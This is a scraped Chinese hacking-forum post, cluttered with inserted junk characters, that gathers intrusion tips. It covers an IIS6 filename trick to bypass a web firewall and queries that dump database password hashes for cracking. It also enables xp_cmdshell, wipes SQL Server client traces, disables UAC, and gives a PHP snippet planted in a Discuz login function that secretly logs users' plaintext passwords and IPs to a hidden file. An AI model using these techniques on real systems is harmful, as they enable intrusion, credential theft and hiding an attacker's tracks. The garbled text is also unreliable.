' W' H7 i3 R' j$ k6 B/ [) _在它下面直接插入即可,记录的密码生成在pwd.txt中,9 ~: ^ G: _& A1 e. J
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
2 s: _; }+ ?6 }: S t$ t, p利用II6文件解析漏洞绕过安全狗代码:, H" r+ N/ b# v
;antian365.asp;antian365.jpg
% B. L/ s$ V; z$ n7 K, g
2 Q" T e' a8 I/ o- G各种类型数据库抓HASH破解最高权限密码!4 ]. [- ~( `2 f7 f! L
1.sql server2000
6 O* a# C* M# }SELECT password from master.dbo.sysxlogins where name='sa'
& Y0 Q3 N1 |- G3 o; y5 l0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341- |, o; w9 ^( b9 Y4 Q3 p
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
! G& l8 z6 Y. W) E( J; l8 m% U- Z
( s# e; y U5 b! L" f0×0100- constant header
5 } V) I: y1 x$ |; H34767D5C- salt
/ ]& O8 Q9 S1 Q- x% a7 P0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash2 O0 n, U8 h- _* W( |* }% d
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash* {+ j/ B/ u8 s: d
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash$ a0 b) P. p' s% g
SQL server 2005:-
, d) a( q0 R, V$ l( ] bSELECT password_hash FROM sys.sql_logins where name='sa'
& p; h- `3 B! d! w* l" P0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
( \/ M; {8 n" U6 Q0 j9 z3 A0×0100- constant header5 s$ G7 c' N9 N' C* L/ Z! F
993BF231-salt
; O$ [5 O. E, [ I# N5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
" c% f' |5 e- }crack case sensitive hash in cain, try brute force and dictionary based attacks. N5 \. R7 `/ R2 C# C8 r7 p8 A6 y7 r
" Z& B8 G: @' x4 |5 zupdate:- following bernardo’s comments:-* i# Q/ h/ a: d
use function fn_varbintohexstr() to cast password in a hex string.
( b+ t4 B$ l8 i" Z: ?e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
8 l' a! I1 R0 C8 b8 B$ D: [; \( X) \5 y/ g K( S# Y- V
MYSQL:-
/ U9 C; k+ x3 o* e: `3 @" o# x. K( k
* n) E& U! N& S% V# E+ KIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
% p$ W) c/ g# \6 j* t9 p+ ] e+ e: w" z' Q( H
*mysql < 4.12 U# g/ z& Z8 J r5 l
3 B. w# B% n$ ~; F; \* g$ ?
mysql> SELECT PASSWORD(‘mypass’);
6 a2 z9 \9 L+ ]# i3 t+——————–+ V! {+ v; y, K, M
| PASSWORD(‘mypass’) |
# h- T6 X* n/ h2 p' u# z- P& r+——————–+
' p8 k- H" z. s& Q$ k2 a% r5 q+ j6 }2 }| 6f8c114b58f2ce9e |
) ^( N0 E: ?, F& J/ l7 {2 g9 y+——————–+
! G5 G4 L0 X% _9 v
, P3 G8 s1 L, V9 L( K*mysql >=4.1: a& I$ A" V, f. I: q/ M; {
, A: \& L8 [9 }% l1 N$ m! w
mysql> SELECT PASSWORD(‘mypass’);# h h% z6 ]$ w4 l- S& h
+——————————————-+' W+ p1 F% |+ \* F, z$ s' w, ?/ _
| PASSWORD(‘mypass’) |
* V8 g }3 l, c2 c0 l! u U; Y; O+——————————————-+
f4 H' F2 `# J( W( d3 W# a* H| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
/ |0 d V6 H- J/ z2 J) Z+ ?$ S+——————————————-+
3 p4 B) o7 w0 s* o' S& s3 I6 I& {8 R, }
Select user, password from mysql.user8 N! c5 ?8 P% d! e$ Y, ?6 r5 y# L& U
The hashes can be cracked in ‘cain and abel’
$ ~6 b2 b/ l6 x! ~$ u4 j# k" j& H J1 w: K0 R9 U
Postgres:-2 O" I* Q6 `& Y% d
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
# V- L* b! |9 S0 c' Yselect usename, passwd from pg_shadow;/ Z/ }2 I; ?6 Y( [- w% d- h, D
usename | passwd
& W% h" u, {) m1 D7 m7 O n! |——————+————————————-) u: k& X' }3 h% ^
testuser | md5fabb6d7172aadfda4753bf0507ed4396
/ \" d; K6 G2 Q, T- S+ guse mdcrack to crack these hashes:-
1 X9 Z& q& y4 h# ]/ Q- E$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
! C7 W% h( i; H+ h% V" N u! ^9 L1 \# j6 R1 ]
Oracle:-
( c& T2 f# j- s4 X* d# uselect name, password, spare4 from sys.user$
O4 Z2 c% ?2 t, m" Z! J- [hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
- D' }) R7 ?2 ~7 {* AMore on Oracle later, i am a bit bored….
9 K2 @% n" t' h; ~
' x6 z% G) S: H& t! {
& q* K6 I- l8 q在sql server2005/2008中开启xp_cmdshell$ h! L+ i% X$ R6 s6 Y
-- To allow advanced options to be changed.6 N! U1 O6 U7 |: D9 v+ J
EXEC sp_configure 'show advanced options', 17 H8 E: g0 H6 E5 z
GO/ [. Z0 j" ?$ x* _+ H3 L" ^# D
-- To update the currently configured value for advanced options.
/ I1 X t, c; T3 v; {0 j" ORECONFIGURE
) H+ M- J; ^, ~' x7 x5 O" e+ q! GGO
- Z) `4 C, |' X" h+ d& z/ u* Q-- To enable the feature.
$ K6 [+ ?5 ?5 ^6 m* Y! s9 U0 CEXEC sp_configure 'xp_cmdshell', 1- \* f% }/ C; E5 s5 W: P
GO
3 @' q; O! L! G! g0 A' j7 g-- To update the currently configured value for this feature.% ]# E" G: H: f1 I( r5 s4 U
RECONFIGURE# z4 J( G* z% M: Z1 \; ?" N
GO6 D, j. ]) s( G; k) m5 Y
SQL 2008 server日志清除,在清楚前一定要备份。
$ f+ d7 n4 o0 Y; k1 U如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
2 W7 F( Q c* P+ J3 m7 {X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin& K( |+ k2 u% y9 l# F) N
5 s1 e; V8 i; Y6 \/ U: z& ?6 n对于SQL Server 2008以前的版本:$ m3 R0 u$ g6 ?+ }* g7 `( Z" x- s: x
SQL Server 2005:- p: F: W( O/ X
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
% x; m2 l! X: g [( w3 cSQL Server 2000:& p; B; E3 ~6 x3 y+ b! Z0 d
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。' R$ q N0 ^" k
; O; g2 r3 o3 N" f; _本帖最后由 simeon 于 2013-1-3 09:51 编辑9 T* S+ s( q& h2 e' }$ n' |
; M+ g" B7 G k; z& _6 e0 D
0 j4 Q; ]3 L" D# q0 {2 ?$ u5 t
windows 2008 文件权限修改
1 }5 p2 l1 Z$ k( S1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx2 F& a& `/ u! r7 f; U
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
. M7 |2 e, A0 ]% K" t一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
7 \5 }! U" u) K& s& p. {% _6 _( f$ h$ R' O% F7 b, g0 A
Windows Registry Editor Version 5.00
: R3 B0 x# p4 f! P$ ~6 Q: o+ L1 p9 c[HKEY_CLASSES_ROOT\*\shell\runas]
8 C% o- x2 v& c* V; C$ ?6 F@="管理员取得所有权"' J0 \9 l3 H, [5 Q
"NoWorkingDirectory"=""4 D2 x. W0 E7 L- Q& p+ W
[HKEY_CLASSES_ROOT\*\shell\runas\command]
& o& h5 V: i, v" S& r7 z" B' F@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"* q. P0 }; T) d% @
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
7 H/ B. j3 s" B3 `8 t[HKEY_CLASSES_ROOT\exefile\shell\runas2]/ i3 Z; Y, C& f7 j4 G. |6 k
@="管理员取得所有权"7 z5 A9 C$ K3 Z. ^, n
"NoWorkingDirectory"=""# D: I4 I: N; R! ^8 B0 B
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]8 @% k! e2 l- V, _, u
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"5 L9 X6 [& w6 V3 n, U
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 _8 M% @+ Z. J( ] v7 Y( E8 @! R1 n7 z7 D6 g8 s6 a
[HKEY_CLASSES_ROOT\Directory\shell\runas]
/ m7 e- m# ]6 a0 a* D; Z# }@="管理员取得所有权"9 q' o# [+ {0 i5 F8 s$ Z
"NoWorkingDirectory"=""( u5 Q5 I! t/ X3 [( O5 o; Y6 u
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]9 ]% m9 k8 U$ K; U( L" W m
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t". Z. ?9 U5 j' W1 n* P# R
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
7 W9 K1 @3 H6 o) f
]1 D# y9 l7 i2 z. B& f* ^
2 m6 ?% R/ Z* u5 U' [6 n6 ]7 S9 awin7右键“管理员取得所有权”.reg导入
/ }) G5 |* c4 E; x* B7 C0 J( H: `二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
" u/ f7 e7 O# G1、C:\Windows这个路径的“notepad.exe”不需要替换0 A* v' R5 Z }% g8 a' L. M3 h
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
/ J0 m' p; K! O0 o( N% ~4 C3、四个“notepad.exe.mui”不要管( n% m! H1 H) S! ~# R0 t$ t
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
! U/ S% ]# m& K- ^C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
& l0 F: U5 H: Q2 t1 ~2 O替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,0 ^. `, |% e2 K5 b5 ?/ p
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
' G( f2 w" T1 b6 Jwindows 2008中关闭安全策略: ' ]- E$ U4 H9 j1 }5 h
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
( p/ Y1 x f* Z修改uc_client目录下的client.php 在
+ p; h p5 X; v1 Q4 P7 O- J3 l; A2 Jfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
1 _" m& z. I7 A5 R. Q1 G3 D ?下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
+ l( S% l1 Y4 R0 r你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw& S" c8 n7 w3 V5 i% O; x
if(getenv('HTTP_CLIENT_IP')) {% K% _/ C; ]' I* C/ H! y' a
$onlineip = getenv('HTTP_CLIENT_IP');
0 c! \! u# D/ R I( L+ Y} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
- q) v( _1 J, [- z9 v$onlineip = getenv('HTTP_X_FORWARDED_FOR');( {) Z/ K3 i. s/ D+ l& k' W2 C
} elseif(getenv('REMOTE_ADDR')) {3 ~& Q8 m) O3 U* w$ m
$onlineip = getenv('REMOTE_ADDR');* S. R ]6 w0 c
} else {
/ d8 J: b7 J' v$ h. y$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
5 @3 V) f( ]8 T; n}. Q! M8 ^- }1 O. R0 X6 b
$showtime=date("Y-m-d H:i:s");# T4 h0 j: }; ~
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";, l0 Z/ a0 H7 z0 j6 Y& @
$handle=fopen('./data/cache/csslog.php','a+');; J. w, `5 t- R# O# T) @
$write=fwrite($handle,$record); |